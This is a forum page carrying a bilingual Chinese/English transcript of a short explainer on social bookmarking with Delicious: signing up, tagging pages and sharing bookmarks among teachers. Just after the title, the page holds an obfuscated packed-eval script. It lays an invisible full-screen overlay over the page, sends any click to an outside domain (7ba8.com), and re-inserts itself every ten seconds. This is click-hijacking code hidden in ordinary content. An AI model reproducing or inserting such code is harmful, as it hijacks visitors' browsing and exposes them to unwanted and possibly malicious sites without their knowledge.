社会化书签(Social Bookmarking)为何物

<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>偶滴神呐!如今网页数已超过150亿
It's just too much. Did you know that there are over 15 billion web pages?
我们常会收藏喜欢的网页以便日后浏览
To make sense of it all, we need to pluck out the best pages and save them for later.
通常我们会给网页添加书签或者添加收藏夹
We have choices. We could bookmark or add to favorites in our web browser.
但收藏夹很快就变得乱糟糟
Nah, it quickly becomes messy.
而且这些书签只能保存在本地电脑上
Plus, these bookmarks are tied to only one computer.
太out了
This is the old way.
现在有一种很潮的方法,用网站代替书签和收藏夹
There's a new way that doesn't use a browser. It uses a website.
称为社会化书签网站 以Delicious为例
This is called a social bookmarking site, and the one we'll use today is called Delicious.
它让添加书签的过程变得简单又有趣
It makes bookmarking more useful and fun.
那么如何添加书签、管理书签标签 以及如何实现书签的社会化?
We'll focus on three things: How to get started with bookmarking, how bookmarks are organized by tags, and why this kind of bookmarking is social.
第一步,登录delicious完成注册
First, go to delicious.com to sign up for a free account.
该过程会引导你在浏览器上添加快捷按钮
While you're signing up, you'll see an easy way to add a couple of buttons to your browser.
这很关键
These are important.
点击快捷按钮就能轻松添加书签
The Tag button is how you'll add new bookmarks to the website. On any website, you can click Tag to save that site as a delicious bookmark. Easy!
假如你是数学老师,要在网上找课件
Consider this example, you are a teacher who often uses the web to find math lessons for 8th graders.
而相关网站多得眼花缭乱
You're overwhelmed by all the sites. There are just too many to remember.
别担心,用delicious的标签功能就能轻松分类
Using delicious, remembering sites is as easy as tagging them.
这招很赞吧
Here's one. Oh nice, perfect.
点击收藏时会弹出详情询问窗口
Here's what happens when you tag a site: a new window opens and asks for more information.
可以添加关键字或标签来描述这个网站
You can add keywords or tags that describe the site.
这样日后查找起来就方便了
These will help you find bookmarks later.
你可以填:代数,精品,辅导,数学,家庭作业
You might tag this site, algebra, best of, tutorial, math, and homework,
然后点击保存按钮
then click save to save it on the delicious website.
网站及其标签都被保存下来
When you save a page like this, two things happen.
网站被保存到你在delicious上的书签列中
First, the site is saved with all your other bookmarks on delicious.com.
标签也同时被保存到标签清单里
Second, the tags are saved in a list of all your tags.
保存网页就是这么简单
You just repeat this process for every site you want to save. This is bookmarking.
那么标签为何如此重要?
Let's fast forward two months to make our second point: Why tags are so important.
假如你存了一百个书签,找起来会很麻烦
Let's say you now have a hundred bookmarked sites. Chaos, right?
这时标签能帮你将书签分类
Well, since your added tags, you have a way to sort the bookmarks by the tags you assigned.
如果要找有关代数的网站,点击代数,瞬间筛选成功
To find all your sites about algebra, you click the algebra tag, and voila, one hundred becomes three.
有了标签,找书签不用愁
All your bookmarks are now more findable thanks to tags.
更有趣的在后面
But that's only part of the fun.
社会化书签到底如何实现社会化?
Now, let's look at the social part of bookmarking to make our third point.
老师之间能不能共享书签呢?同事能分享你的收藏吗?
Think about your fellow teachers. Couldn't they benefit from seeing your bookmarks?
没问题!
Well, they can.
Delicious书签可以公开
Delicious bookmarks are public.
朋友同事之间的书签都能实现共享
This means your friends and peers can see your bookmarks and use your tags just like you.
这就是它的社会化特性
That's why this is called social bookmarking.
一人收藏,万人受益
Your bookmarks can benefit other people.
不妨设想一下
Think about it this way.
你收藏了一个有趣的代数网站,同事看到了
You start bookmarking algebra sites, and your peers can see the interesting sites you find.
也开始使用书签
Then, they start bookmarking too.
没几周,老师们都在标记他们最喜欢的数学网站
Within a few weeks, a group of teachers are all bookmarking their favorite math websites,
而书签的公开性使每个人可以从中获益
and because they're all public, everyone discovers new and relevant material.
大家有了个书签交流平台,相互分享有趣且实用的网站
Together you create a network that produces a steady stream of interesting and useful websites, all organized by tags on the delicious website.
社会化标签使你的网络世界更加有序
The lesson is that social bookmarking sites take a world of chaos and make it orderly.
回顾一下步骤 一、注册并在浏览器上添加按钮
Remember there are three steps to get started. First go to delicious.com to sign up and add the buttons to your browser.
二、用标签标记网页
Second, start bookmarking sites with tags.
三、学会分享,你会在别人的标签中获得寻宝的乐趣
And third, be social. Notice how useful and fun other people's bookmarks can be.
这就是社会化书签,我是原来如此的李?勒菲弗
I'm Lee LeFever, and this has been Social Bookmarking in Plain English.
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Copyright © 2020-2021 tigtag.com |网站地图  
快速回复 返回列表 返回顶部